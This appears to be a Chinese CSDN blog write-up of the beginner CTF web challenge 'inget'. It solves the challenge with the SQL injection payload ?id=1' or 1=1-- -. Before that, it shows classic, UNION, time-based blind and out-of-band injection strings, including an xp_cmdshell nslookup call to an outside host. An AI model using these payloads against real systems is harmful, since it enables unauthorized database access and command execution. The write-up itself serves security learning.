【攻防世界】CTF 网络安全学习180天 之 inget

已于 2023-11-15 16:56:31 修改
阅读量635 收藏 3
点赞数 6
分类专栏: 【攻防世界】CTF题库系统学习 文章标签: web安全 sql 网络安全
于 2023-11-15 16:54:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Bing_Geng/article/details/134421248
版权

【攻防世界】inget


作者:冰耿
作者其他详细专栏
CTF系统学习专栏https://blog.csdn.net/bing_geng/category_12496105.html
Python爬虫学习专栏https://blog.csdn.net/bing_geng/category_12494819.html

正文

Please enter ID,and Try to bypass
难度:1
方向:Web,SQL注入
题目描述:无

题干界面

在这里插入图片描述

本人思路

  1. 这个题目的题目描述为无,但在进入了题目界面后,提示了这样子的一句话。
    在这里插入图片描述
    翻译过来就是输入id,且尝试绕过,查看源代码,发现源代码只有这一句话,也没有其他信息。

  2. CTF攻防就是信息的整理和收集,然后把所有细节加起来考虑出方向。

    1. 题目 inget,应该是使用get请求的意识
    2. 而提示的那句话,please enter ID,and try to bypass, 猜测应该是以id作为参数,然后尝试绕过

  3. 下面将是我的思路,以id作为参数然后作为绕过
    1)尝试id=1,会出现什么结果。结果就是无事发生,是老样子
    在这里插入图片描述
    2) 尝试把id的位数输大一点,是不是又长度判断.结果还是老样子。然后我猜想是不是id要爆破?所以我在一个虚拟机一边进行了爆破
    在这里插入图片描述
    3) 关键信息里面还有一个很重要的信息就是绕过。所谓绕过最常见的在web安全里面的就是SQL注入,绕过验证。那什么是SQL注入,下面将举几个例子,简单讲讲SQL注入

    SQL注入是一种利用应用程序对用户输入的处理不当而导致的安全漏洞。攻击者通过在用户输入中插入恶意的SQL代码,从而欺骗应用程序执行非预期的数据库操作。这可能导致数据库泄露、数据篡改或未经授权的访问。

SQL注入的常见类型:
Classic SQL Injection:

SELECT * FROM users WHERE username = 'admin' AND password = 'password123';
如果用户输入 admin' OR '1'='1'; -- 作为密码,整个SQL语句变为:

SELECT * FROM users WHERE username = 'admin' AND password = 'admin' OR '1'='1'; --';
效果: 使条件始终为真,绕过身份验证。
Union-Based SQL Injection:

SELECT name, email FROM users WHERE id = 1 UNION ALL SELECT username, password FROM admins;
如果用户输入 1 UNION ALL SELECT NULL, NULL, NULL; -- 作为ID,整个SQL语句变为:
SELECT name, email FROM users WHERE id = 1 UNION ALL SELECT NULL, NULL, NULL; --';
效果: 将两个查询的结果联合起来,通常用于获取额外的信息。
Time-Based Blind SQL Injection:


SELECT * FROM users WHERE username = 'admin' AND password = 'password123' AND IF(1=1, SLEEP(5), 0);
如果用户输入 admin' AND IF(1=2, SLEEP(5), 0); -- 作为密码,整个SQL语句变为:
SELECT * FROM users WHERE username = 'admin' AND password = 'admin' AND IF(1=2, SLEEP(5), 0); --';
效果: 利用延时函数,根据应用程序是否延时来判断条件是否为真。
Out-of-Band SQL Injection:

SELECT * FROM users WHERE username = 'admin'; -- HTTP request to attacker-controlled server
如果用户输入 admin'; EXEC xp_cmdshell('nslookup example.com'); -- 作为用户名,整个SQL语句变为:
SELECT * FROM users WHERE username = 'admin'; EXEC xp_cmdshell('nslookup example.com'); --';

效果: 利用SQL Server的 xp_cmdshell 执行命令,实现带外数据传输。
防范SQL注入的方法包括使用参数化查询、输入验证和限制数据库用户的权限。开发者应该仔细处理用户输入,确保不会被直接拼接到SQL查询中

4)因此我们尝试使用最容易注入的or,就是下面这个语句
?id=1’ or 1=1-- -

意思:在 id 参数的输入后添加了 or 1=1,其中 1=1 始终为真,注释部分 – - 表示在此之后的所有内容都是注释,不会被执行。(那个分号的作用是关闭原始查询中的字符串,然后插入 or 1=1-- -,如果对分号不太熟悉使用位置,可以多次试验)
效果:使查询条件中至少有一个条件为真,通常用于绕过某些权限控制。
末尾的 – - 是 SQL 中的注释符号,它表示在此之后的所有内容都是注释,不会被执行。这是为了确保恶意注入的部分不会干扰原始查询的执行。
5) 运行界面
在这里插入图片描述

总结

1)较为综合的考察了SQL注入绕过,且提示较其他难度为1的题目较少,是一个学习SQL注入的入门经典例题

Bing_Geng
关注
  • 6
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
网络安全攻防大赛ctf题目
03-09
网络安全攻防大赛CTF(Capture The Flag)是一种流行的竞赛形式,旨在提升参赛者的网络安全技能,包括漏洞挖掘、密码学、取证分析、网络嗅探等多个领域。这类比赛通常分为多个环节,如逆向工程、Web安全、密码学、二...
攻防世界 inget
qq_53105813的博客
10-15 1035
攻防世界wp
攻防世界WEB练习-inget
热门推荐
不知名白帽的博客
09-01 1万+
攻防世界WEB练习-inget
攻防世界CTF 网络安全学习180 之 inget_please enter id,and try to bypass
最新发布
2401_84520245的博客
05-13 622
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
adworld-web-inget-20221226
32bin的博客
12-26 866
题目来源: 宜兴网信办题目描述:无______||[(]|||__,|||[!
网络安全 | CTF攻防世界 inget 解题详析
等风来
07-23 4259
由于该语句为真,却无回显,故可排除数字型注入。语句,再根据回显做下一步判断。思路:尝试利用or构造。使用sqlmap爆数据。
攻防世界-inget(简单的SQL注入、万能密码)
Welcome To Myon'Blog !
04-14 4847
inget(简单的SQL注入)、手工注入、万能密码原理、sqlmap实现、常用参数
CTF网络安全攻防介绍
12-19
主要介绍网络安全攻防安全知识,以及需要的编码和所需要的
ctf网络安全攻防练习题
12-04
网络安全攻防CTF竞赛】 CTF(Capture The Flag)是网络安全领域中一种流行的竞赛形式,它将攻防技术融入到竞技游戏中,参赛者通过解密、逆向工程、漏洞挖掘等多种技能来获取“旗标”(Flag),从而得分。这种...
智能网联汽车 融信杯 信息安全攻防赛 2023 CTF真题
07-14
智能网联汽车 融信杯 信息安全攻防赛 2023 CTF真题
CTF比赛网络安全竞赛渗透测试入门资料
06-30
CTF比赛 网络安全竞赛 渗透测试 入门资料
攻防世界-web-inget
mlws1900的博客
08-23 830
这题目搞了半没思路,又是从get里面传参,又是添加了header内容,一点反应都没。
攻防世界-新手模式2
m0_73960954的博客
10-19 123
本题需要利用文件上传漏洞点,通过绕过服务器的安全防护,达到getshell的目的。打开只看到Please enter ID,and Try to bypass。本题的主要考点为利用fastcgi的.user.ini特性进行任意命令执行。id=1' or 1=1-- -检查后缀中是否有htaccess或ph。检查文件内容是否有php字符串。这里需要绕过的点如下。
攻防世界新手区部分web wp 2
fcz___的博客
02-09 1297
攻防世界web新手区部分wp
攻防世界inget
qq_55510415的博客
04-22 529
现在传入id=1' or 1=1-- -就变成了'id=1' or 1=1-- -',id=1或者1=1返回都是true,-- abc表示注释后面代码。由此可获得flag。对url进行修改添加/?原本当传入id的时候例如id=1就是'id=1'思路:通过id进行sql注入。请输入ID,并尝试绕过。
攻防世界-Web-inget新手
wangwei011的博客
05-16 1177
攻防世界-Web-inget
攻防世界:inget&php_rce&Web_php_include&unserialize3
weixin_74473832的博客
03-15 682
查了一下str.replace (old, new max]) 有三个参数,old是需要替换的值,new是替换后的值,max是最多替换的次数。这里的意思大概就是要用get方式提交一个page参数,但是会过滤掉page的值里面的php://。代码的意思大概是有一个xctf的类,会调用wakeup魔术方法,然后会回显bad requests。根据题目说的php-rce,去浏览器搜索这个版本的thinkphp框架的历史命令执行漏洞。这里用的是or,前后关系中只要一个对的,这个关系式就是真的,所以成功绕过。
攻防世界】刷题笔记【CTF
weixin_43485035的博客
10-10 1707
攻防世界刷题整理出来的笔记
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值